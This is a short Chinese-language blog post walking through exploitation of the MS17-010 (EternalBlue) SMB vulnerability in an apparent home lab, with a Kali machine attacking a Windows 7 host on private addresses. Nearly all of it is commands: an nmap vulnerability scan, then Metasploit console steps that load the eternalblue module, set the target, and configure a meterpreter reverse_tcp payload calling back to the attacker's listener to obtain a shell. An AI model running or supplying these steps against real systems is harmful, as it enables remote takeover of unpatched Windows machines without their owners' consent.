ms17_010(永恒之蓝)

环境:

Kali-Linux IP:192.168.1.2

Windows 7 IP:192.168.1.10

扫描是否漏洞存在:

nmap --script=vuln -T4 -v 192.168.1.10

 扫描结果存在漏洞

漏洞利用:

打开msfconsole,搜索漏洞存放目录 search ms17_010

msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.10                                                                                                                                                                   
rhosts => 192.168.1.10                                                                                                                                                                                                                     
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.2
lhost => 192.168.1.2

 

运行脚本,拿到shell

 

posted @ 2020-11-08 20:21  y夏天  阅读(75)  评论(0)    收藏  举报